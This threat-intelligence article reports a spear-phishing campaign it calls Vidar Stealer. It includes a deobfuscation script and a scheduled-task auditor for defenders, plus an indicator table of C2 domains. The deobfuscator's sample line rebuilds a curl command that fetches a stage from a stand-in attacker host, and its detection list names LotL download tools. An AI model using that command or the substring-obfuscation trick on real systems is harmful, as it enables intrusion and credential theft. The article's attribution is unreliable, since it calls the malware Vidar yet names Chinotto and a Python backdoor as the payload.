New Vidar Stealer Campaign Evades EDR, Steals Credentials
Key Takeaways
- A new, sophisticated campaign is distributing Vidar Stealer, actively targeting Windows users.
- The malware employs advanced evasion techniques, including multi-stage delivery and environment variable obfuscation, to bypass Endpoint Detection and Response (EDR) solutions.
- Initial compromise occurs via spear-phishing emails containing malicious shortcut files, leading to the theft of browser credentials, session cookies, and cryptocurrency wallet data.
- The campaign utilizes Living-off-the-Land (LotL) tactics and creates deceptive scheduled tasks for persistence.
Stealthy Vidar Stealer Campaign Evades EDR, Targets Windows Users for Credential Theft
A highly sophisticated and stealthy campaign is currently deploying Vidar Stealer against Windows users, leveraging an intricate attack chain specifically designed to circumvent Endpoint Detection and Response (EDR) systems and extract sensitive user credentials. This operation is notable for its quiet execution, often completing its malicious objectives before victims are aware of any compromise.
Vidar Stealer, an information-stealing malware first identified in 2018 as a variant of the Arkei stealer, has continuously evolved. It possesses robust capabilities for extracting browser passwords, session cookies, cryptocurrency wallet information, authentication tokens, and autofill data stored locally on infected systems. The latest iteration of this malware enhances these capabilities with advanced evasion mechanisms, allowing it to consistently bypass modern EDR tools.
Security researchers at Genians Security Center were instrumental in identifying and analyzing this campaign. Their findings highlight the use of multi-stage delivery techniques, heavily obfuscated script execution, and the abuse of legitimate system utilities to avoid triggering security alerts. Because the activity blends in with normal system use, the campaign is particularly dangerous for organizations that rely primarily on traditional signature-based detection.
Initial Access and Evasion Tactics
The attack typically begins with highly targeted spear-phishing emails, meticulously crafted to align with the recipient’s professional context or personal interests. These emails contain ZIP archives that, when opened, reveal Windows shortcut files disguised as ordinary work documents. Executing these shortcut files silently triggers an obfuscated command in the background, without any visible indication to the user.
The malware proceeds through a series of secondary payload downloads, ultimately deploying its core information-stealing component. Each stage of this process employs environment variable-based obfuscation, where commands are reconstructed only at runtime. This technique often defeats static analysis tools, preventing early detection and response.
A critical aspect of this campaign’s evasion strategy involves preventing behavior-based detection. Threat actors utilize environment variable-based substring expansion to fragment and reassemble commands character by character. This ensures that the complete malicious command string never appears in plaintext during execution, forcing security tools to analyze individual fragments rather than recognizing the full intent of the instruction. Additionally, the attackers leverage curl.exe, a native Windows binary, to download further payloads from remote servers. This “Living-off-the-Land” (LotL) tactic makes detection challenging, as legitimate system tools are being used. A Python Embed package is also retrieved from a trusted external source, establishing a silent execution environment and minimizing suspicion associated with outbound network activity.
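An analyst-side deobfuscator for the substring-expansion trick described above, added here as an illustration and not taken from the Genians report or the campaign's own scripts: it resolves cmd.exe `%VAR:~start,length%` fragments against a supplied environment and flags batch lines whose expanded form reveals a native tool (such as curl) that the raw line never spelled out. The environment values, the sample batch line and the `c2.invalid` host are constructed, not captured from the campaign.

```python
import re
from typing import Dict

# cmd.exe substring expansion: %VAR:~start% or %VAR:~start,length% (both may be negative).
SUBSTR_RE = re.compile(r"%([A-Za-z_][A-Za-z0-9_()]*):~(-?\d+)(?:,(-?\d+))?%")

# Native tools the article reports being abused (curl.exe downloads, schtasks persistence).
LOTL_TOOLS = ("curl", "schtasks", "powershell", "certutil", "bitsadmin")

def cmd_substring(value: str, start: int, length) -> str:
    """Apply cmd.exe substring rules: a negative start counts from the end of the
    value, a negative length drops that many characters from the end."""
    n = len(value)
    s = start if start >= 0 else max(n + start, 0)
    if length is None:
        return value[s:]
    end = s + length if length >= 0 else n + length
    return value[s:max(end, s)]

def expand_substrings(line: str, env: Dict[str, str]) -> str:
    """Resolve every substring-expansion fragment against env (variable names are
    case-insensitive in cmd); unknown variables are left as-is for the analyst."""
    def repl(m):
        value = env.get(m.group(1).upper())
        if value is None:
            return m.group(0)
        length = None if m.group(3) is None else int(m.group(3))
        return cmd_substring(value, int(m.group(2)), length)
    return SUBSTR_RE.sub(repl, line)

def analyze_line(line: str, env: Dict[str, str], min_fragments: int = 4) -> dict:
    """Flag a batch line that is stitched from many fragments, or whose expansion
    reveals a LotL tool name that never appears in plaintext in the raw line."""
    fragments = len(SUBSTR_RE.findall(line))
    expanded = expand_substrings(line, env)
    hidden = [t for t in LOTL_TOOLS if t in expanded.lower() and t not in line.lower()]
    return {"fragments": fragments, "expanded": expanded, "hidden_tools": hidden,
            "suspicious": fragments >= min_fragments or bool(hidden)}

# Constructed environment and sample line (not from the campaign). PUBLIC is
# "C:\Users\Public", whose characters at offsets 14, 10, 6 and 12 spell "curl".
SAMPLE_ENV = {"PUBLIC": r"C:\Users\Public", "COMSPEC": r"C:\Windows\system32\cmd.exe"}
SAMPLE_LINE = (r"%PUBLIC:~14,1%%PUBLIC:~10,1%%PUBLIC:~6,1%%PUBLIC:~12,1%.exe -s -o "
               r"%PUBLIC%\stage.cab http://c2.invalid/stage")

if __name__ == "__main__":
    print(analyze_line(SAMPLE_LINE, SAMPLE_ENV))
```

Running the expansion in a detection pipeline (for example over process-creation command lines) lets a behavior rule match on the reconstructed command rather than on the fragments the attackers intend it to see.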
For persistence, a scheduled task is created, deliberately named to mimic a legitimate Microsoft system process (e.g., “MicrosoftMusicLibrariesPackageTaskMachine”). This ensures the malware runs at one-minute intervals and survives system reboots. The final payload, a compiled Python bytecode file disguised with a .cat extension, functions as a remote access backdoor, capable of executing commands, collecting files, and exfiltrating system data to attacker-controlled infrastructure.
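An added audit helper for the persistence pattern described above (example code, not from the article or the Genians analysis): it parses a Task Scheduler XML definition, such as one exported with `schtasks /query /xml`, and reports tight repetition intervals, actions that run from outside the system directories, and root-level task names that imitate the \Microsoft\ task folder. The task XML is constructed, and the install path under Users\Public is an assumption; only the file names come from the article's indicators.

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Directories legitimate Microsoft maintenance tasks normally execute from (lower-case).
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

def iso_duration_seconds(value):
    """Task Scheduler repetition intervals are ISO 8601 durations (PT1M, PT5M30S, P1D)."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", value or "")
    if not m:
        return None
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 86400 + h * 3600 + mi * 60 + s

def audit_task(name, xml_text, max_interval=300):
    """Return the reasons a task matches the persistence pattern: a repetition
    interval at or below max_interval seconds, an action outside trusted system
    directories, and a root-level name imitating the \\Microsoft\\ task folder."""
    root = ET.fromstring(xml_text)
    reasons = []
    for interval in root.findall(".//t:Repetition/t:Interval", NS):
        secs = iso_duration_seconds(interval.text)
        if secs is not None and secs <= max_interval:
            reasons.append(f"repeats every {secs}s")
    for cmd in root.findall(".//t:Actions/t:Exec/t:Command", NS):
        path = (cmd.text or "").strip().strip('"').lower()
        path = path.replace("%systemroot%", "c:\\windows").replace("%windir%", "c:\\windows")
        if not path.startswith(TRUSTED_DIRS):
            reasons.append(f"runs from untrusted path {path}")
    n = name.lstrip("\\").lower()
    if n.startswith("microsoft") and not n.startswith("microsoft\\"):
        reasons.append("root-level name imitating the Microsoft task folder")
    return reasons

# Constructed task definition (not a capture from the campaign); the UTF-16 XML
# declaration of a real export is omitted, and the Users\Public path is assumed.
SAMPLE_TASK_XML = """<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <LogonTrigger>
      <Repetition><Interval>PT1M</Interval></Repetition>
      <Enabled>true</Enabled>
    </LogonTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Users\\Public\\Libraries\\codeflush.exe</Command>
      <Arguments>settingenv.cat</Arguments>
    </Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for reason in audit_task("MicrosoftMusicLibrariesPackageTaskMachine", SAMPLE_TASK_XML):
        print(reason)
```

Real exports are UTF-16 with an XML declaration, so read them as bytes and let ElementTree honour the declared encoding rather than decoding them to text first.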
Credential Theft and Broader Impact
Vidar’s primary objective in this campaign is to exfiltrate user credentials and other sensitive data from Chromium-based browsers and similar applications. It specifically targets locally stored passwords, session cookies, and encrypted key files used by browsers to protect login information. The malware employs the Windows CryptUnprotectData API to decrypt these keys directly from the browser’s Local State file, thereby gaining full access to saved credentials.
Investigations revealed multiple command-and-control (C2) domains spread across various countries and hosting providers, complicating infrastructure-based blocking efforts for defenders. The widespread deployment of these credential theft tools underscores the broad impact across numerous sectors.
What You Should Do
- Enhance EDR capabilities with robust behavior-based detection to identify obfuscated script execution and multi-stage download activities.
- Implement policies to block the execution of shortcut files (LNK files) from within compressed archives, especially those received via email.
- Regularly audit scheduled tasks on endpoints for any suspicious entries that mimic legitimate system processes.
- Advise users against saving credentials directly within web browsers; instead, encourage the use of reputable password managers.
- Conduct ongoing security awareness training to educate employees about the dangers of spear-phishing and malicious attachments.
Indicators of Compromise (IoCs)
| Type | Indicator | Description |
|---|---|---|
| Domain | kmot.co[.]kr | Korea-based C2 server hosting malicious payloads |
| Domain | haeundaejugong[.]com | C2 server used to collect and exfiltrate user data |
| Domain | kumdo[.]org | Secondary C2 server for data exfiltration |
| Domain | nls5950.cafe24[.]com | C2 infrastructure used in related malicious activity |
| Domain | hanainternational[.]net | C2 domain linked to threat actor infrastructure |
| Domain | mlgpf.ir114[.]net | C2 domain associated with campaign |
| Domain | luminix[.]kr | C2 domain identified in related malicious files |
| Domain | sunlin[.]org | C2 domain observed in threat actor infrastructure |
| Domain | ezvm[.]kr | C2 domain linked to malicious distribution |
| Domain | intobiz[.]kr | C2 domain used in campaign infrastructure |
| Domain | choisy[.]fr | France-based C2 server observed in attack chain |
| Domain | printory[.]kr | Domain used to host compiled Python bytecode malware |
| Domain | udcontest[.]com | Domain hosting webshell used in phishing attack |
| Domain | ableinfo.co[.]kr | Distribution infrastructure for malicious files |
| IP Address | 114.207.246[.]156 | IP address shared across multiple attack domains |
| File Name | settingenv.cat | Compiled Python bytecode payload disguised as Windows catalog file |
| File Name | codeflush.exe | Renamed pythonw.exe used as stealthy malware execution host |
| File Name | GX)/M27s.bat | Obfuscated batch file used for secondary payload execution |
| File Name | ms3360.bat | Batch file variant used in obfuscated execution chain |
| File Name | yS1825.bat | Batch file variant identified in attack chain |
| File Name | K3772.bat | Batch file variant used in environment variable obfuscation |
| File Name | HqcUpdate.exe | Final information-stealing payload (Chinotto) |
| File Name | WStep163.cab | Obfuscated Python script downloaded from C2 server |
| File Name | MicroAppsTemp28h2.bat | Batch file downloaded from C2 for follow-up activity |
| Scheduled Task | MicrosoftMusicLibrariesPackageTaskMachine | Persistence mechanism disguised as legitimate Microsoft task |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.